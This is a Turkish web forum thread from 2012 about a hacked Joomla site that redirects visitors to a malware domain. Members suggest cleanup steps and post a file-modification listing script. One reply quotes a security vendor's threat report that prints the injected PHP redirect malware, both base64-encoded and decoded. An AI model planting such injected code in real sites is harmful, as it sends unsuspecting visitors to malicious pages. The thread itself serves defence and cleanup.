PDA

Orijinalini görmek için tıklayınız : Sayfalar yabancı adrese gidiyor bu hatanın çözümü nasıldır?



ihsanone
26-08-2012, 14:38
arkadaşlar google afyon03.com yazdığımda site çıkıyor fakat oradaki linklerden birini tıklattığımda http://www6.uiopqw.jkub.com/ böyle bir link çıkıyor. bunun sebebi nedir?ücretli düzeltebielcek var mı?veya basit birşey ise yardımcı olabailicek var mı? Böyle birşeyle hiç karşılaşmadım çok tuhafıma gitti

Akar
26-08-2012, 15:56
Linklerden biri ama hangisi? Ben birkaç yere tıkladım sorun göremedim. Muhtemelen hack yemişsiniz. Önce sorunun nasıl oluştuğu tesbit edilmeli yoksa bir link düzeltmekle temizlik gerçekleşmiş olmaz.

Arfmin
26-08-2012, 17:58
Web sitesine virüs bulaşmış/bulaştırılmış gibi sanırım. FTP kanalıyla site dosyalarını bilgisayara indirip buradaki (http://ninjafirewall.com/malware/index.php?threat=2012-08-08.01)sitede belirtilen kodların olup olmadığının kontrol edilmesi gerektiğini düşünüyorum. Eğer belirtilen kodların bulaştığı dosyalar mevcut ise bunları orjinalleri ile değişirmeniz mhtemelen sorunu çözecektir.

angelaus
26-08-2012, 18:31
evet hacklenmiş görünüyor. anasayfa bile otomatik yönleniyor

mhusty
26-08-2012, 21:22
sitecheck.sucuri.net/scanner/ şu adresten sitenizi tarattırın ve hangi dosyalarda virüs olduğunu anlayabilirsiniz ordaki kodları silin. htaccess dosyasınıda bir kontrol ediniz

Ümit
27-08-2012, 00:56
İlk önce şu an kullandığınız temayı devre dışı bıraktıktan sonra tema dosyalarını yer sağlayıcınız üzerinden tamamen kaldırın. Bundan sonra sorun devam ediyorsa ilk önce kullanılan eklenti kontrolü yapılmalı ve daha sonra tüm joomla dosyaları yenilenerek sorunun devam edip etmediğine bakılmalı.

Sitenin yönlendiği bağlantıyı tüm klasör ve dosyalar içinde arayın. (Notepad++ (http://notepad-plus-plus.org/) > Arama > Dosyada Bul (Site klasörler ve dosyaları)
Tema klasör ve dosyaları içerisinde "base64" ile şifrelenmiş olan kodların olup olmadığını kontrol edin.

mehmettan
27-08-2012, 05:55
Walla ya ne güzel forum 1 mesajı olan arkadaşımıza bile böyle önemli bir konuda bu kadar cevap gelmiş. keşke soruyu soran arkadaşımızda sonucu bizimle paylaşsaydı. Bu gibi sorun yaşayan arkadaşlar izleyecekleri yolun ne olması gerektiğini daha rahat kavrarlardı.

ihsanone
27-08-2012, 12:55
Teknik bilgim olmadığından sorunu bir haftada ancak yaparım gibi geliyor. yardımcı olan arkadaşlarıma çok teşekkürler. soncu sizinle paylaşacağım

ihsanone
29-08-2012, 00:55
arkadaşlar sitem joomla 1.5 sürüm ben siteye yeniden joomla 2.5 kursam arkasından da veri tabını yüklesem sorun çözülür mü?Ana sayfa bozulur mu?

ihsanone
29-08-2012, 01:01
htcasses şu şekilde içeride base64 falan ayzıyor virüs mü acaba onlar?




##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license The GNU General Public License v3.0 - GNU Project - Free Software Foundation (FSF) (http://www.gnu.org/copyleft/gpl.html) GNU/GPL
# Joomla! is Free Software
##


################################################## ###
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
################################################## ###

## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
# mod_rewrite in use

RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
########## End - Rewrite rules to block out some common exploits


########## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
########## End - Custom redirects


# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)

# RewriteBase /


########## Begin - Joomla! core SEF Section
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
########## End - Joomla! core SEF Section

ihsanone
29-08-2012, 01:12
sorunu çözdüm arkadaşlar

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule> bunu ayzdım

ihsanone
29-08-2012, 21:26
sorunu çözdüm arkadaşlar

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule> bunu ayzdım


sorun çözüldüğünü sanmışım çözülmedi .ücretli yapabilecek varsa ihsanone@hotmail.com msn eklesın görüşelim

Ümit
29-08-2012, 21:51
Google
(http://www.google.com.tr/#hl=tr&output=search&sclient=psy-ab&q=http:%2F%2Fwww6.uiopqw.jkub.com%2F&oq=http:%2F%2Fwww6.uiopqw.jkub.com%2F&gs_l=hp.3...1311.1311.0.1497.1.1.0.0.0.0.0.0..0.0. ..0.0...1c.Ba26EB6M51s&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.&fp=5825d5e621d8bd1&biw=1024&bih=643)
Google araması sonuçlarına yukarıdan bakabilirsiniz.




DATE

2012-05-30









REF

2012-05-30.01















TYPE

Redirection to malware site









TARGET

Joomla









WHERE

all PHP files









VULNERABILITY

Joomla PHP code injection (via uploaded backdoor)









MALWARE_DOMAIN

www6.uiopqw.jkub.com









MALWARE_URI

http://www6.uiopqw.jkub.com/









MALWARE_RAW_CODE

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ
okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt
KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT
sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K
aWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFID
cuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikg
b3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdH
IoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZl
cmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS
5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Ig
c3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKC
RyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJl
ciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdH
VtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJi
aXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLm
NvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5k
c2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcm
VnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwk
cmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS
5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5j
b20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIH
sNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAh
c3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIk
xvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20v
Iik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==""));









MALWARE_OUT_CODE

error_reporting(0);





$qazplm=headers_sent();





if (!$qazplm){





$referer=$_SERVER['HTTP_REFERER'];





$uag=$_SERVER['HTTP_USER_AGENT'];





if ($uag) {





if (!stristr($uag,"MSIE 7.0")){





if (stristr($referer,"yahoo") or
stristr($referer,"bing") or
stristr($referer,"rambler") or
stristr($referer,"gogo") or
stristr($referer,"live.com")or
stristr($referer,"aport") or
stristr($referer,"nigma") or
stristr($referer,"webalta") or
stristr($referer,"begun.ru") or
stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or
stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/"
,$referer) or preg_match
("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or
stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) {





if (!stristr($referer,"cache") or
!stristr($referer,"inurl")){





header("Location: http://www6.uiopqw.jkub.com/");





exit();





}





}





}





}





}









OFFENDING_IP

66.197.196.21, 78.9.172.4, 80.247.67.218,
91.220.84.56, 137.82.168.11





NinjaFirewall : Malware threat report [2012-08-08 #01] (http://ninjafirewall.com/malware/index.php?threat=2012-08-08.01)

ihsanone
01-09-2012, 13:53
Bu virüslü kodları nerelerde arayacağım ve nasıl arayacağım? bu virüsleri bulmam için bir program falan var mı yoksa elle mi bakacağım. elle bakacaksam nerelere bakacağım

KKKK
01-09-2012, 15:12
Böle bir sorun başıma gelmişti. Bilgisayara bulaşan bir truva atı ftp ile sitelere bağlandığım zaman bütün neredeyse bütün dosyalara kendini bulaştırmıştı. Çözüm olarak siteye ftp deki dosyarın hangilerinin hangi tarihte değiştirildiğini gösteren bir dosya yüklemiştim ve buradan değiştirilen dosyaları açarak tek tek temizlemiştim. Sonra bütün sitedeki dosyaları kaldırıp tekrar yüklemiştim. Oldukça zahmetli ama kesin sonuca ulaşan bir yöntem.

KKKK
01-09-2012, 15:16
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
body, td {
font-size: 8pt;
font-family: sans-serif;
}
a:link, a:hover, a:active, a:visited {
font-size: 8pt;
color: #0000FF;
}
</style>
</head>
<body>
<?php

$dir = ".";
$directories = array();
$files = array();

function recursedir($rootdir){
$directories = array();
$files = array();
$dir = (substr($rootdir, -1) == '/') ? substr($rootdir, 0, -1) : $rootdir;
if(is_dir($dir)){
if($handle = opendir($dir)){
while(false !== ($file = readdir($handle))){
if($file != "." && $file != ".."){
$filename = $dir.'/'.$file;
if(is_dir($filename)){
$folder = $filename;
$files = array_merge($files, recursedir($filename));
//echo $folder."<br />";
} else {
$files[$filename] = filemtime($filename);
}
}
}
closedir($handle);
} else {
die('Could not open directory.');
}
} else {
die('Invalid directory.');
}
return $files;
}

$files = recursedir(".");
if($_GET['sort'] == 'alpha'){
if($_GET['mode'] == 'desc'){
krsort($files);
$highlight = 'alpha_desc';
} else {
ksort($files);
$highlight = 'alpha_asc';
}
} else {
if($_GET['mode'] == 'asc'){
asort($files, SORT_NUMERIC);
$highlight = 'date_asc';
} else {
arsort($files, SORT_NUMERIC);
$highlight = 'date_desc';
}
}
$sort_alpha_asc = ($highlight == 'alpha_asc') ? '<b>Asc</b>' : '<a href="?sort=alpha&mode=asc">Asc</a>';
$sort_alpha_desc = ($highlight == 'alpha_desc') ? '<b>Desc</b>' : '<a href="?sort=alpha&mode=desc">Desc</a>';
$sort_date_asc = ($highlight == 'date_asc') ? '<b>Asc</b>' : '<a href="?sort=date&mode=asc">Asc</a>';
$sort_date_desc = ($highlight == 'date_desc') ? '<b>Desc</b>' : '<a href="?sort=date&mode=desc">Desc</a>';
echo "Sort by: Date- $sort_date_asc | $sort_date_desc; Name- $sort_alpha_asc | $sort_alpha_desc<br />\n<br />\n";

echo "<table border=\"0\">\n<tr><td><u>File</u></td><td width=\"25\"></td><td><u>Size</u></td><td width=\"25\"></td><td><u>Last Modified</u></td></tr>\n";
foreach($files as $file => $timestamp){
echo "<tr><td><a href=\"$dir/$file\">$file</a></td><td></td><td>";
$filesize = filesize($file);
if($filesize >= 1048576){
echo round($filesize / 1048576, 1).'MB';
} else {
echo round($filesize / 1024, 1).'kb';
}
echo '</td><td></td><td>'.date('d M Y H:i:s', $timestamp)."</td></tr>\n";
}
echo '</table>';

?>

</body>
</html>


Dosya bu bu dosyayı php olarak kaydedip sitenizin ana fizinine atın ve tarayıcınız ile bağlanın. Değiştirilen dosyaların değiştirilme tarihlerine bakın ve sizin bilginiz dışında değişen dosyalarınızı düzenleyip (muhtemelen </body> tagından hemen önce bir script yüklenmiştir) yeniden sitenize atın

muratti
02-09-2012, 05:27
arkadaşlar google afyon03.com yazdığımda site çıkıyor fakat oradaki linklerden birini tıklattığımda http://www6.uiopqw.jkub.com/ böyle bir link çıkıyor. bunun sebebi nedir?ücretli düzeltebielcek var mı?veya basit birşey ise yardımcı olabailicek var mı? Böyle birşeyle hiç karşılaşmadım çok tuhafıma gitti

Sunucuna .htaccess dosyasını değiştiren exploit bulaşmış.Yenisi ile değiştirsen bile yine kendini kopyalar.Benim joomla ile yaptığım 15 adet siteye bulaştı.Shared hosting olduğu için tüm sitelere bulaştı.Bu sorunu çözmenin en kolay yolu akeeba ile sitenin yedeğini alıp host hesabını resetlemek ve yeniden kurmak.Ben bu şekilde çözdüm.
Diğer çözüm ise SEF url leri devre dışı bırakmak(Bu pek hoş değil geçici olarak kullanılabilir).
Bu işlemi yaptığın bilgisayarın temiz olduğundan emin ol.Bu sorunla ilgili nette çok arama yaptım.Belirli bir dosyadan bulaşan virüs değil.Dosya izinlerini bozarak çalışıyor.Muhtemelen görseller bile executable olmuştur. Net bir açıklama bulamadım.
Önerdiğim yöntemle çözemezsen iletişime geç, yardımcı olurum(ücretsiz:begendim:).

Akar
02-09-2012, 15:44
Sunucuna .htaccess dosyasını değiştiren exploit bulaşmış.Yenisi ile değiştirsen bile yine kendini kopyalar.Benim joomla ile yaptığım 15 adet siteye bulaştı.Shared hosting olduğu için tüm sitelere bulaştı.Bu sorunu çözmenin en kolay yolu akeeba ile sitenin yedeğini alıp host hesabını resetlemek ve yeniden kurmak.Ben bu şekilde çözdüm.
Diğer çözüm ise SEF url leri devre dışı bırakmak(Bu pek hoş değil geçici olarak kullanılabilir).
Bu işlemi yaptığın bilgisayarın temiz olduğundan emin ol.Bu sorunla ilgili nette çok arama yaptım.Belirli bir dosyadan bulaşan virüs değil.Dosya izinlerini bozarak çalışıyor.Muhtemelen görseller bile executable olmuştur. Net bir açıklama bulamadım.
Önerdiğim yöntemle çözemezsen iletişime geç, yardımcı olurum(ücretsiz:begendim:).Daha kolay bir şey önereceğim. Bu virüs neticede otomatik tarayıcılarla bulaştırılıyor. Kimse özel olarak sizin sitenizi hedeflemiyor. Onun için eğer temizleyebilirleniz temizlenmiş olur. Temizlemenin yolu da tüm htaccess dosyalarını aynı anda silmekten geçiyor. Yoksa dediğiniz gibi siz bir yandan silerken virüs bir yandan silinenleri yeniden oluşturuyor. Bir hosting kullanıcısı bu dosyaları bir kerede ve aynı anda silemez. Onun için hizmet aldığı yerden yardım istemeli. Hosting hesabındaki tüm htaccess dosyaları aynı anda tek komut ile sunucu yöneticisi tarafından silinebilir. Size kalan ise orijinal htaccess dosyasını Joomla paketinden çıkartıp Joomla ana dizinine göndermek olur. Hatta hizmet aldığınız yere ana htaccess dosyası dışındakileri sil de diyebilirsiniz tabii.

Shared hosting denilen paylaşımlı barındırma, yani birden fazla hesabın bir sunucuda bulunması, başka deyişle bildiğimiz klasik hosting sistemi bu virüsün diğer hesaplara bulaşabilmesine imkan vermez. Buna imkan veren şey sunucunun güvensiz yapılandırması ya da sizin kendi enfekte bilgisayarınızdır. Aklınızda olsun.

Ben de bu virüs ile bir müşterim sebebiyle yeni tanıştım. Sunucudaki diğer yüzlerce sitede herhangi bir sorun yoktu. Dolayısıyla enfekte olan sunucu değil hesap idi. Temizliği dediğim şekilde yapabildik, sunucu yöneticisi tüm htaccess dosyalarını ssh üzerinden tek kalemde sildikten sonra sorun düzeldi.

muratti
02-09-2012, 18:56
tüm htaccess ları silmek sorun yaratmaz mı? htaccess kullanan bileşenler ve pluginler düzgün çalışamayabilir sanırım.Dediğiniz gibi sunucuya değil hesaba bulaşan virüs, benim kendi hesabımdaki tüm sitelere bulaşmıştı.Benim için eski hosting hesabım deneme alanı oldu.Siteleri yedekledim ve önemli olanları başka hostinge taşıyıp aktifleştirdim.Ssh ile dediğiniz gibi deneme yapıp tüm htaccess ları sileceğim bakalım nasıl sonuç verecek.

Akar
02-09-2012, 20:07
tüm htaccess ları silmek sorun yaratmaz mı? htaccess kullanan bileşenler ve pluginler düzgün çalışamayabilir sanırım.Dediğiniz gibi sunucuya değil hesaba bulaşan virüs, benim kendi hesabımdaki tüm sitelere bulaşmıştı.Benim için eski hosting hesabım deneme alanı oldu.Siteleri yedekledim ve önemli olanları başka hostinge taşıyıp aktifleştirdim.Ssh ile dediğiniz gibi deneme yapıp tüm htaccess ları sileceğim bakalım nasıl sonuç verecek.Eğer varsa htaccess kullanan eklentikleriniz, onları kendi paketlerinden yeninden yüklersiniz; aynen Joomla htaccess dosyasını yüklemek gibi. Lâkin JED dizine klenmiş binlerce eklentiden htaccess kullanan sayısı yok denecek kadar azdır. Çekirdek eklentilerin hiç birinde de yoktur. Tabii bunlardan birini kullanıyorsanız bilmeniz lazım. Virüs temizliği de dahil, aslolan şeylerden biri kullandığımız sistemi tanımak, neyi var neyi yok bilmek olmalı.